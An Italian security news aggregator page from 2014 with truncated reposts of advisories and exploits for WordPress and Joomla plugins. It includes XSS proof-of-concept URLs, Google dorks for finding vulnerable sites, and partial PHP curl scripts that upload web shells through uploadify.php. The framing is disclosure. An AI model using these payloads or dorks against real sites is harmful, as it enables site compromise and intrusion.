WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

3 aprile 2014 - Fonte: http://www.mondounix.com
Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are much more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected...

Leggi il seguito »

Plugin da wordpress per gestire i siti dallo smartphone

1 aprile 2014 - Fonte: http://www.travagliante.com

wordpress1

La diffusione capillare dei moderni dispositivi elettronici ha allargato a dismisura il settore di mercato in cui operano le aziende produttrici, che devono far fronte ad un numero di utenti in costante crescita. Grazie alle grandi offerte di smartphone e tablet, assieme al pubblico crescono anche i bisogni e le esigenze a cui si deve far fronte, dal momento...

Leggi il seguito »

Joomla Kunena 3.0.4 Cross Site Scripting

28 marzo 2014 - Fonte: http://www.mondounix.com
Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa
 
+++ Description
 
"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
 
Kunena is written in PHP. Users can post a Google Map using the following BBCode
  [map]content[/map]
 
Kunena creates a JavaScript based on input, but doesn't decode it correctly.
 
 
+++ Analysis
 
Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
 
1049  function DoMap($bbcode, $action, $name, $default, $params, $content) {
  ...
1078  $document->addScriptDeclaration("
1079  // <![CDATA[
  ...
1097  var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE',...

Leggi il seguito »

WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Felici / Custom Background Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

Joomla eXtplorer 2.1.3 Cross Site Scripting

21 marzo 2014 - Fonte: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer
2.1.3 component for Joomla! allow remote attackers to inject arbitrary web
script or HTML code via a crafted string inthe URL
to application.js.php, admin.php, copy_move.php,
functions.php, header.php and upload.php.
 
File: /scripts/application.js.php
Line: 45
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
 
File: /include/admin.php
Lines: 72, 143, 176 and 210
POC:
http://site/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin
 
 
File:...

Leggi il seguito »

Joomla Freichat Cross Site Scripting

21 marzo 2014 - Fonte: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in Freichat
component for Joomla! allow remote attackers to inject
arbitrary web script or HTML code via (1) the id or xhash parameters to
/client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php.
 
 
File: /client/chat.php
Line: 53
POC:
http://site/client/chat.php?id=1"
></script><script>alert('XSS
1')</script>&xhash=1" <script>alert('XSS
2')</script>
 
 
File: /client/plugins/upload/upload.php
Line: 91
POC:
   </style>
    <body>
        <div
class="frei_upload_border">
        <form name="upload"
action="http://site/client/plugins/upload/upload.php"
method="post"...

Leggi il seguito »

WordPress LayerSlider 4.6.1 CSRF / Traversal

12 marzo 2014 - Fonte: http://www.mondounix.com
==========================================================
Wordpress plugin LayerSlider WP Version 4.6.1 (Possible all versions) 
suffers from CSRF And from Directory Traversal Vulnerabilities.
 
AFAIK multiple wordpress themes uses this plugin.
And one of them is  satellite - v1.0.2 wordpress theme.
==========================================================
 
Tested on:
Server version: Apache/2.4.7 (Fedora)
Server built:   Mar  3 2014 12:12:09
 
$ php -v
PHP 5.5.10 (cli) (built: Mar  5 2014 17:13:58) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
 
Wordpress 3.8.1 (Fresh install)
 
Theme Default package: satellite - v1.0.2 + LayerSlider WP Version 4.6.1...

Leggi il seguito »

WordPress Barclaycart Shell Upload

10 marzo 2014 - Fonte: http://www.mondounix.com
                        WordPress Barclaycart Plugins Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/barclaycart"
#
#######################################################################################
 
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",...

Leggi il seguito »

WordPress Premium Gallery Manager Shell Upload

8 marzo 2014 - Fonte: http://www.mondounix.com
          Wordpress Plugins Premium Gallery Manager Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
 
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
...

Leggi il seguito »